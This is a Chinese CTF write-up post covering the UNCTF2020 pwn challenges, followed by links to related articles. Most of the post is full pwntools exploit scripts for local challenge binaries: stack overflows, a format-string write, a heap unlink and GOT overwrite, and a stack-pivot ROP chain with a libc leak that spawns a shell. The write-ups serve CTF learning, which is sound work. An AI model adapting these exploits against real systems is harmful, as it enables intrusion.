YLBNB

  用pwntools直接连接,然后接受就行。

1 from pwn import *
2
3 p = remote('45.158.33.12',8000)
4 context.log_level = 'debug'
5 print p.recvuntil('}')[-30:]

fan

  简单的栈溢出,直接覆盖返回地址为shell的地址就行。

1 from pwn import *
2
3 p = process('./pwn')
4 #p = remote('node2.hackingfor.fun',33550 )
5
6 shell = 0x000400735
7 payload = 'a'*0x30 + 'bbbbbbbb' + p64(shell)
8 p.send(payload)
9 p.interactive()

do_you_like_me?

  和上一题几乎一模一样...估计是不同学校的出题人没有商量好。

1 from pwn import *
2
3 p = process('./pwn')
4 #p = remote('node2.hackingfor.fun',33436)
5
6 shell = 0x004006CD
7 payload = 'a'*0x10 + 'bbbbbbbb' + p64(shell)
8 p.send(payload)
9 p.interactive()

你真的会pwn嘛?

  存在格式化字符串漏洞,修改bss上的数据不为0就可以了。这里用的pwntools的模块直接生成的。

 1 from pwn import *
2
3 p = process('./pwn')
4 #p = remote('node2.hackingfor.fun',38272)
5 context(os='linux',arch='amd64',log_level='debug')
6
7 attack_addr = 0x060107C
8 payload = payload = fmtstr_payload(10,{attack_addr:1})
9 p.sendline(payload)
10 p.interactive()

baby_heap

  程序本身有system("/bin/sh"),然后存在off-by-one漏洞,我这里利用unlink拿到一个可以读写的指针,打free_got让指向shell,然后free就拿到shell了。这题还侥幸拿了一血。

 1 from pwn import *
2
3 p = process('./pwn')
4 #p = remote('node2.hackingfor.fun',32488)
5 elf = ELF('./pwn')
6 context.log_level = 'debug'
7
8 def duan():
9 gdb.attach(p)
10 pause()
11
12 def add(size,content):
13 p.sendlineafter('>> ','1')
14 p.sendlineafter('size?\n',str(size))
15 p.sendafter('content?\n',content)
16
17 def edit(index,content):
18 p.sendlineafter('>> ','4')
19 p.sendlineafter('index ?',str(index))
20 p.sendafter('content ?\n',content)
21
22 def delete(index):
23 p.sendlineafter('>> ','2')
24 p.sendlineafter('index ?',str(index))
25
26 fd = 0x0602160-0x18
27 bk = 0x0602160-0x10
28 shell = 0x040097F
29 free_got = elf.got['free']
30 system_got = elf.got['system']
31
32 add(0x88,'bhxdn') #0
33 add(0x90,'bhxdn') #1
34 edit(0,p64(0)*2+p64(fd)+p64(bk)+p64(0)*12+p64(0x80)+'\xa0')
35 delete(1)
36 edit(0,p64(0)*3+p64(free_got))
37 edit(0,p64(shell))
38 delete(0)
39 p.interactive()
40 #duan()

keer's bug

  存在栈溢出,但是没有足够的长度让我们写rop,这里先修改rbp为bss段上的地址,然后将返回地址覆盖成main函数中间的地方。然后再一个read,在bss段写rop泄露libc,然后栈转移回去bss段执行leak libc_base,之后再执行main函数,将返回地址覆盖成one_gadget拿shell,除了做csu,还是第一次知道栈能这么玩。(感谢L0ne1y师傅的指点)

 1 from pwn import *
2
3 p = process('./pwn')
4 #p = remote('node2.hackingfor.fun',36522)
5 elf = ELF('./pwn')
6 libc = ELF('./libc.so.6')
7 context.log_level = 'debug'
8
9 #gdb.attach(p,'b *0x00040060D')
10
11 buf = 0x0601060+0x100
12 pop_rsi_r15 = 0x000400671
13 pop_rdi = 0x000400673
14 fun_got = elf.got['write']
15 write_plt = elf.plt['write']
16 read_plt = elf.plt['read']
17 main = elf.symbols['main']
18 leave_ret = 0x0040060D
19
20 ret = 0x004005ED
21 payload = 'a'*0x50+p64(buf)+p64(ret)
22 p.sendafter('keer!!!\n',payload)
23
24 sleep(0.5)
25 payload = p64(pop_rdi)+p64(1)
26 payload +=p64(pop_rsi_r15)+p64(fun_got)+p64(0)+p64(write_plt)
27 payload +=p64(main)+p64(0)*3+p64(buf-0x58)+p64(leave_ret)
28 p.send(payload)
29 libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['write']
30 print hex(libc_base)
31
32 shell = libc_base + 0xf0364
33 payload =p64(0)*11+p64(shell)
34 #gdb.attach(p)
35 p.send(payload)
36 p.interactive()

UNCTF2020 pwn题目的更多相关文章

  1. SCTF 2014 pwn题目分析

    因为最近要去做ctf比赛的这一块所以就针对性的分析一下近些年的各大比赛的PWN题目.主防项目目前先搁置起来了,等比赛打完再去搞吧. 这次分析的是去年的SCTF的赛题,是我的学长们出的题,个人感觉还是很 ...

  2. 解决pwn题目加载指定libc版本的问题

    因为本地和远程的libc版本不同,pwn题目调试起来会有影响,所以来记录一下用patchelf和glibc-all-in-one来解决这个问题过程. 下载工具 下载patchelfgit clone ...

  3. BIT 常态化在线CTF系统 pwn题目

    偶然得到这个平台,发现是BIT的CTF平台,应该是平时的阶段性的训练题目.看了看题,其他方向的题目感觉都是入门题,但是pwn题目,发现还是比入门题难一点点的,来记录一下. pwn1 栈上任意位置的读写 ...

  4. 2020 NUPCTF pwn题目

    去年的一场比赛,今年来把去年不会做的题目来看一下,只在buu找到三道题,剩下两道好像是内核题,算了,估计找到也不会做. npuctf_2020_level2 bss段上的格式化字符串漏洞的利用. 程序 ...

  5. WHUCTF PWN题目

    花了大概两天时间来做WHUCTF的题目,第一次排名这么靠前.首先感谢武汉大学举办这次萌新赛,也感谢fmyy的师傅的耐心指导,让我第一次做出堆的题目来. pwnpwnpwn 这是一道栈题目,32位程序, ...

  6. 使用pwn_deploy_chroot部署国赛pwn比赛题目

    目录 使用pwn_deploy_chroot部署国赛pwn比赛题目 一.前言 二.Docker 三.部署镜像 四.pwn_deploy_chroot 五.check && exp 六. ...

  7. pwn学习之二

    刚刚开始学习pwn,记录一下自己学习的过程. 今天get了第二道pwn题目的解答,做的题目是2017年TSCTF的easy fsb,通过这道题了解了一种漏洞和使用该漏洞获取shell的方法:即格式化字 ...

  8. pwn学习之一

    刚刚开始学习pwn,记录一下自己学习的过程. 今天完成了第一道pwn题目的解答,做的题目是2017年TSCTF的bad egg,通过这道题学习到了一种getshell的方法:通过在大小不够存储shel ...

  9. Linux pwn入门教程(3)——ROP技术

    作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html 0×00 背景 在上一篇教程的<shellco ...

随机推荐

  1. [cf1392I]Kevin and Grid

    令$v$为点数(有公共点的格子中存在红/蓝色).$e$为边数(有公共边的格子中存在红/蓝色).$f$为以此法(即仅考虑这些点和边)所分割出的区域数(包括外面).$s$为连通块个数,将欧拉定理简单扩展, ...

  2. Java安全之Axis漏洞分析

    Java安全之Axis漏洞分析 0x00 前言 看到个别代码常出现里面有一些Axis组件,没去仔细研究过该漏洞.研究记录一下. 0x01 漏洞复现 漏洞版本:axis=<1.4 Axis1.4 ...

  3. myeclipse配置pydev插件

    下载PyDev插件 myeclipse10最好配PyDev2.7的版本,比较简单, 解压之后,进入文件夹.发现里面只有两个文件夹,将这两个文件夹复制 到myeclipse的文件下面,myeclipse ...

  4. [FJOI2021]游记

    高一这条命早在\(NOIP\)就没了,现在不过是强行续命罢了,希望死的不要很难看. 高二重开一档,最后一条命了,希望能高二进队\(Orz\). \(Day -2\) 开始敲板子. 先写了个交互的题,猜 ...

  5. 洛谷 P4900 - 食堂(推式子)

    洛谷题面传送门 首先推式子: \[\begin{aligned} ans&=\sum\limits_{i=A}^B\sum\limits_{j=1}^i\{\dfrac{i}{j}\} \en ...

  6. 感谢 git

    今天对程序大修了一下,顺便把所有算例测试了一遍,突然发现二维浅水方程有些算例出现了明显的错误. 这次突然出现的错误让我有点措手不及,因为一直没有修改过浅水方程求解器,所以这些算例很久没有测试过了.硬着 ...

  7. 使用mamba加快conda安装软件速度?

    conda是个安装软件的神器,但镜像不稳定,下载安装软件的速度有时很慢.对于几十Mb甚至上百Mb的软件往往下不动,下了半天可能失败. 找了一个叫mamba的加速神器,可以用来并行下载和安装,大大加快速 ...

  8. R语言与医学统计图形-【29】地图的绘制

    R绘制地图原理: R使用一个个多边形(polygon)来表示每个区域,通过顺次连接GIS数据提供的每个区域多边形的坐标来逐点绘制这些多边形,所以理论上只要得到GIS数据就可绘制相应的地图. 地图绘制说 ...

  9. centOS6和7单用户修改密码

    CentOS6 1.       进入启动系统倒计时的时候,按esc 之后进入一下界面: 2.       按a 键进入修改内核参数页面 3.       在quiet后面加入空格和1 ,如下:回车进 ...

  10. Linux— rpm 命令

    rpm命令是RPM软件包的管理工具.rpm原本是Red Hat Linux发行版专门用来管理Linux各项套件的程序,由于它遵循GPL规则且功能强大方便,因而广受欢迎.逐渐受到其他发行版的采用.RPM ...